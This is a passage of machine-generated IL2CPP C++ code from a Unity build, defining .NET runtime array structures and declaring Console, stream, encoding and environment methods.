RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_DelegateType_14() { return &___DelegateType_14; } inline void set_DelegateType_14(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___DelegateType_14 = value; Il2CppCodeGenWriteBarrier((&___DelegateType_14), value); } inline static int32_t get_offset_of_s_SICtorParamTypes_15() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___s_SICtorParamTypes_15)); } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* get_s_SICtorParamTypes_15() const { return ___s_SICtorParamTypes_15; } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F** get_address_of_s_SICtorParamTypes_15() { return &___s_SICtorParamTypes_15; } inline void set_s_SICtorParamTypes_15(TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* value) { ___s_SICtorParamTypes_15 = value; Il2CppCodeGenWriteBarrier((&___s_SICtorParamTypes_15), value); } inline static int32_t get_offset_of_s_typedRef_25() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___s_typedRef_25)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_s_typedRef_25() const { return ___s_typedRef_25; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_s_typedRef_25() { return &___s_typedRef_25; } inline void set_s_typedRef_25(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___s_typedRef_25 = value; Il2CppCodeGenWriteBarrier((&___s_typedRef_25), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMETYPE_T40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_H // System.Object[] struct ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A : public RuntimeArray { public: ALIGN_FIELD (8) RuntimeObject * m_Items[1]; public: inline RuntimeObject * GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline RuntimeObject ** GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, RuntimeObject * value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } inline RuntimeObject * GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline RuntimeObject ** GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, RuntimeObject * value) { m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } }; // System.Delegate[] struct DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86 : public RuntimeArray { public: ALIGN_FIELD (8) Delegate_t * m_Items[1]; public: inline Delegate_t * GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline Delegate_t ** GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, Delegate_t * value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } inline Delegate_t * GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline Delegate_t ** GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, Delegate_t * value) { m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } }; // System.Byte[] struct ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821 : public RuntimeArray { public: ALIGN_FIELD (8) uint8_t m_Items[1]; public: inline uint8_t GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline uint8_t* GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, uint8_t value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; } inline uint8_t GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline uint8_t* GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, uint8_t value) { m_Items[index] = value; } }; // System.RuntimeType[] struct RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE : public RuntimeArray { public: ALIGN_FIELD (8) RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * m_Items[1]; public: inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } }; // System.Char[] struct CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2 : public RuntimeArray { public: ALIGN_FIELD (8) Il2CppChar m_Items[1]; public: inline Il2CppChar GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline Il2CppChar* GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, Il2CppChar value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; } inline Il2CppChar GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline Il2CppChar* GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, Il2CppChar value) { m_Items[index] = value; } }; // System.Int64[] struct Int64U5BU5D_tE04A3DEF6AF1C852A43B98A24EFB715806B37F5F : public RuntimeArray { public: ALIGN_FIELD (8) int64_t m_Items[1]; public: inline int64_t GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline int64_t* GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, int64_t value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; } inline int64_t GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline int64_t* GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, int64_t value) { m_Items[index] = value; } }; // System.String[] struct StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E : public RuntimeArray { public: ALIGN_FIELD (8) String_t* m_Items[1]; public: inline String_t* GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline String_t** GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, String_t* value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } inline String_t* GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline String_t** GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, String_t* value) { m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } }; // System.Int32[] struct Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83 : public RuntimeArray { public: ALIGN_FIELD (8) int32_t m_Items[1]; public: inline int32_t GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline int32_t* GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, int32_t value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; } inline int32_t GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline int32_t* GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, int32_t value) { m_Items[index] = value; } }; // System.DateTimeParse/DS[] struct DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E : public RuntimeArray { public: ALIGN_FIELD (8) int32_t m_Items[1]; public: inline int32_t GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline int32_t* GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, int32_t value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; } inline int32_t GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline int32_t* GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, int32_t value) { m_Items[index] = value; } }; // System.DateTimeParse/DS[][] struct DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1 : public RuntimeArray { public: ALIGN_FIELD (8) DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* m_Items[1]; public: inline DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* GetAt(il2cpp_array_size_t index) const { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items[index]; } inline DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E** GetAddressAt(il2cpp_array_size_t index) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); return m_Items + index; } inline void SetAt(il2cpp_array_size_t index, DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* value) { IL2CPP_ARRAY_BOUNDS_CHECK(index, (uint32_t)(this)->max_length); m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } inline DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* GetAtUnchecked(il2cpp_array_size_t index) const { return m_Items[index]; } inline DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E** GetAddressAtUnchecked(il2cpp_array_size_t index) { return m_Items + index; } inline void SetAtUnchecked(il2cpp_array_size_t index, DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* value) { m_Items[index] = value; Il2CppCodeGenWriteBarrier(m_Items + index, value); } }; // System.Void System.Object::.ctor() extern "C" IL2CPP_METHOD_ATTR void Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0 (RuntimeObject * __this, const RuntimeMethod* method); // System.Object System.Object::MemberwiseClone() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Object_MemberwiseClone_m1DAC4538CD68D4CF4DC5B04E4BBE86D470948B28 (RuntimeObject * __this, const RuntimeMethod* method); // System.String System.Environment::GetResourceString(System.String) extern "C" IL2CPP_METHOD_ATTR String_t* Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9 (String_t* ___key0, const RuntimeMethod* method); // System.Void System.InvalidOperationException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706 (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * __this, String_t* ___message0, const RuntimeMethod* method); // System.Void System.Collections.DictionaryEntry::.ctor(System.Object,System.Object) extern "C" IL2CPP_METHOD_ATTR void DictionaryEntry__ctor_m67BC38CD2B85F134F3EB2473270CDD3933F7CD9B (DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 * __this, RuntimeObject * ___key0, RuntimeObject * ___value1, const RuntimeMethod* method); // System.Void System.ArgumentOutOfRangeException::.ctor(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR void ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * __this, String_t* ___paramName0, String_t* ___message1, const RuntimeMethod* method); // System.Void System.Array::Clear(System.Array,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void Array_Clear_m174F4957D6DEDB6359835123005304B14E79132E (RuntimeArray * ___array0, int32_t ___index1, int32_t ___length2, const RuntimeMethod* method); // System.Void System.Collections.Stack::.ctor(System.Int32) extern "C" IL2CPP_METHOD_ATTR void Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, int32_t ___initialCapacity0, const RuntimeMethod* method); // System.Void System.Array::Copy(System.Array,System.Int32,System.Array,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void Array_Copy_mA10D079DD8D9700CA44721A219A934A2397653F6 (RuntimeArray * ___sourceArray0, int32_t ___sourceIndex1, RuntimeArray * ___destinationArray2, int32_t ___destinationIndex3, int32_t ___length4, const RuntimeMethod* method); // System.Void System.ArgumentNullException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * __this, String_t* ___paramName0, const RuntimeMethod* method); // System.Int32 System.Array::get_Rank() extern "C" IL2CPP_METHOD_ATTR int32_t Array_get_Rank_m38145B59D67D75F9896A3F8CDA9B966641AE99E1 (RuntimeArray * __this, const RuntimeMethod* method); // System.Void System.ArgumentException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7 (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * __this, String_t* ___message0, const RuntimeMethod* method); // System.Int32 System.Array::get_Length() extern "C" IL2CPP_METHOD_ATTR int32_t Array_get_Length_m2239B6393651C3F4631D900EFC1B05DBE8F5466D (RuntimeArray * __this, const RuntimeMethod* method); // System.Void System.Array::SetValue(System.Object,System.Int32) extern "C" IL2CPP_METHOD_ATTR void Array_SetValue_m3C6811CE9C45D1E461404B5D2FBD4EC1A054FDCA (RuntimeArray * __this, RuntimeObject * ___value0, int32_t ___index1, const RuntimeMethod* method); // System.Void System.Collections.Stack/StackEnumerator::.ctor(System.Collections.Stack) extern "C" IL2CPP_METHOD_ATTR void StackEnumerator__ctor_m6F43FBDA48F989B725ADA7CCEC46900630B631F7 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * ___stack0, const RuntimeMethod* method); // System.Void System.Console/InternalCancelHandler::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void InternalCancelHandler__ctor_m82D5D85CC1F50839540B6072DFCADAD07F6223FF (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method); // System.Boolean System.Environment::get_IsRunningOnWindows() extern "C" IL2CPP_METHOD_ATTR bool Environment_get_IsRunningOnWindows_m450E4F44CC5B040187C3E0E42B129780FABE455D (const RuntimeMethod* method); // System.Int32 System.Console/WindowsConsole::GetInputCodePage() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetInputCodePage_m492EDD139F7E66A90971A069FA4DD63000F77B4F (const RuntimeMethod* method); // System.Text.Encoding System.Text.Encoding::GetEncoding(System.Int32) extern "C" IL2CPP_METHOD_ATTR Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * Encoding_GetEncoding_m0F51F30DFDD74D989E27C58C53FC82718CC51F68 (int32_t ___codepage0, const RuntimeMethod* method); // System.Int32 System.Console/WindowsConsole::GetOutputCodePage() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetOutputCodePage_mAF546B0FBC6558F7F2636A86E8733AD4AD2C4DE3 (const RuntimeMethod* method); // System.Text.Encoding System.Text.Encoding::get_Default() extern "C" IL2CPP_METHOD_ATTR Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * Encoding_get_Default_m625C78C2A9A8504B8BA4141994412513DC470CE2 (const RuntimeMethod* method); // System.String System.Text.EncodingHelper::InternalCodePage(System.Int32&) extern "C" IL2CPP_METHOD_ATTR String_t* EncodingHelper_InternalCodePage_m40D628F42FC6E0B635B21496F0BA71A00B009432 (int32_t* ___code_page0, const RuntimeMethod* method); // System.Text.Encoding System.Text.EncodingHelper::get_UTF8Unmarked() extern "C" IL2CPP_METHOD_ATTR Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * EncodingHelper_get_UTF8Unmarked_mDC45343C3BA5B14AD998D36344DDFD0B7068E335 (const RuntimeMethod* method); // System.Void System.Console::SetupStreams(System.Text.Encoding,System.Text.Encoding) extern "C" IL2CPP_METHOD_ATTR void Console_SetupStreams_m6CC1706E3A1838A0C710F3053EF589C7BA934065 (Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___inputEncoding0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___outputEncoding1, const RuntimeMethod* method); // System.Boolean System.ConsoleDriver::get_IsConsole() extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731 (const RuntimeMethod* method); // System.IO.Stream System.Console::OpenStandardInput(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98 (int32_t ___bufferSize0, const RuntimeMethod* method); // System.Void System.IO.CStreamReader::.ctor(System.IO.Stream,System.Text.Encoding) extern "C" IL2CPP_METHOD_ATTR void CStreamReader__ctor_m0522E27BADB6649A8E512728F900EFFA4DBD301A (CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D * __this, Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding1, const RuntimeMethod* method); // System.IO.Stream System.Console::OpenStandardOutput(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823 (int32_t ___bufferSize0, const RuntimeMethod* method); // System.Void System.IO.CStreamWriter::.ctor(System.IO.Stream,System.Text.Encoding,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void CStreamWriter__ctor_m967462FE0368BE80A448F0082E70B326088E2E95 (CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * __this, Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding1, bool ___leaveOpen2, const RuntimeMethod* method); // System.IO.TextWriter System.IO.TextWriter::Synchronized(System.IO.TextWriter) extern "C" IL2CPP_METHOD_ATTR TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * TextWriter_Synchronized_m09204B9D335A228553F62AB1588490109E5DCD86 (TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * ___writer0, const RuntimeMethod* method); // System.IO.Stream System.Console::OpenStandardError(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F (int32_t ___bufferSize0, const RuntimeMethod* method); // System.Void System.IO.UnexceptionalStreamReader::.ctor(System.IO.Stream,System.Text.Encoding) extern "C" IL2CPP_METHOD_ATTR void UnexceptionalStreamReader__ctor_m66258235565573CF051C6F053EADEEF9A67A084D (UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA * __this, Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding1, const RuntimeMethod* method); // System.IO.TextReader System.IO.TextReader::Synchronized(System.IO.TextReader) extern "C" IL2CPP_METHOD_ATTR TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * TextReader_Synchronized_mAC0571B77131073ED9B627C8FEE2082CB28EDA9D (TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * ___reader0, const RuntimeMethod* method); // System.Void System.IO.UnexceptionalStreamWriter::.ctor(System.IO.Stream,System.Text.Encoding) extern "C" IL2CPP_METHOD_ATTR void UnexceptionalStreamWriter__ctor_m4504DBFFC2C8A76C6BA8BB0EE18630E32D03C772 (UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB * __this, Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding1, const RuntimeMethod* method); // System.Void System.GC::SuppressFinalize(System.Object) extern "C" IL2CPP_METHOD_ATTR void GC_SuppressFinalize_m037319A9B95A5BA437E806DE592802225EE5B425 (RuntimeObject * ___obj0, const RuntimeMethod* method); // System.Void System.IO.FileStream::.ctor(System.IntPtr,System.IO.FileAccess,System.Boolean,System.Int32,System.Boolean,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void FileStream__ctor_mBBACDACB97FD9346AC2A5E164C86AB0BA0D160D6 (FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418 * __this, intptr_t ___handle0, int32_t ___access1, bool ___ownsHandle2, int32_t ___bufferSize3, bool ___isAsync4, bool ___isConsoleWrapper5, const RuntimeMethod* method); // System.IntPtr System.IO.MonoIO::get_ConsoleError() extern "C" IL2CPP_METHOD_ATTR intptr_t MonoIO_get_ConsoleError_mBF62E29F14657C9B5982694B3901F6AD7EEB6EFD (const RuntimeMethod* method); // System.IO.Stream System.Console::Open(System.IntPtr,System.IO.FileAccess,System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340 (intptr_t ___handle0, int32_t ___access1, int32_t ___bufferSize2, const RuntimeMethod* method); // System.IntPtr System.IO.MonoIO::get_ConsoleInput() extern "C" IL2CPP_METHOD_ATTR intptr_t MonoIO_get_ConsoleInput_mFC797DF758331A0370296F8DF3136A6B9F1995DC (const RuntimeMethod* method); // System.IntPtr System.IO.MonoIO::get_ConsoleOutput() extern "C" IL2CPP_METHOD_ATTR intptr_t MonoIO_get_ConsoleOutput_m7E36914F192D603C50A8F39745F6443BB2882859 (const RuntimeMethod* method); // System.ConsoleKeyInfo System.Console::ReadKey(System.Boolean) extern "C" IL2CPP_METHOD_ATTR ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 Console_ReadKey_m64DBD2BDB13D04E2E73B95F1BD3B9D08B370D3BA (bool ___intercept0, const RuntimeMethod* method); // System.ConsoleKeyInfo System.ConsoleDriver::ReadKey(System.Boolean) extern "C" IL2CPP_METHOD_ATTR ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ConsoleDriver_ReadKey_m26C9ECDAE36AEE4B923BFDD9420D341AB3DDA900 (bool ___intercept0, const RuntimeMethod* method); // System.Void System.ConsoleCancelEventArgs::.ctor(System.ConsoleSpecialKey) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventArgs__ctor_mF734EC3C82D0A490C0A05416E566BFC53ACFB471 (ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * __this, int32_t ___type0, const RuntimeMethod* method); // System.Void System.ConsoleCancelEventHandler::Invoke(System.Object,System.ConsoleCancelEventArgs) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventHandler_Invoke_mC7E3B6D8555B865719369DBF255D2BB7E952ADD2 (ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * __this, RuntimeObject * ___sender0, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * ___e1, const RuntimeMethod* method); // System.Boolean System.ConsoleCancelEventArgs::get_Cancel() extern "C" IL2CPP_METHOD_ATTR bool ConsoleCancelEventArgs_get_Cancel_mA996E8B7FE802D9A15208AFF397481646751A46F (ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * __this, const RuntimeMethod* method); // System.Void System.Environment::Exit(System.Int32) extern "C" IL2CPP_METHOD_ATTR void Environment_Exit_m3398C2AF5F6AE7197249ECFEDFC624582ADB86EE (int32_t ___exitCode0, const RuntimeMethod* method); // System.Void System.Console::DoConsoleCancelEvent() extern "C" IL2CPP_METHOD_ATTR void Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD (const RuntimeMethod* method); // System.Int32 System.Console/WindowsConsole::GetConsoleCP() extern "C" IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetConsoleCP_m113D8CEC7639D78D9C1D5BA7EA60D70C2F5DB870 (const RuntimeMethod* method); // System.Int32 System.Console/WindowsConsole::GetConsoleOutputCP() extern "C" IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetConsoleOutputCP_m7FC4A3A6237BCB23BFCFCD4295C06F42C3FEE440 (const RuntimeMethod* method); // System.Void System.Console/WindowsConsole/WindowsCancelHandler::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void WindowsCancelHandler__ctor_m75C4D20D6754BB22B858DCB2062CCD61742DEFCF (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method); // System.Void System.EventArgs::.ctor() extern "C" IL2CPP_METHOD_ATTR void EventArgs__ctor_m3551293259861C5A78CD47689D559F828ED29DF7 (EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E * __this, const RuntimeMethod* method); // System.IConsoleDriver System.ConsoleDriver::CreateNullConsoleDriver() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17 (const RuntimeMethod* method); // System.IConsoleDriver System.ConsoleDriver::CreateWindowsConsoleDriver() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* ConsoleDriver_CreateWindowsConsoleDriver_mB2C43CDD6BD7C2159D7B939D8EEBEA9BFC07F5DF (const RuntimeMethod* method); // System.String System.Environment::GetEnvironmentVariable(System.String) extern "C" IL2CPP_METHOD_ATTR String_t* Environment_GetEnvironmentVariable_mB94020EE6B0D5BADF024E4BE6FBC54A5954D2185 (String_t* ___variable0, const RuntimeMethod* method); // System.Boolean System.String::op_Equality(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR bool String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE (String_t* ___a0, String_t* ___b1, const RuntimeMethod* method); // System.IConsoleDriver System.ConsoleDriver::CreateTermInfoDriver(System.String) extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* 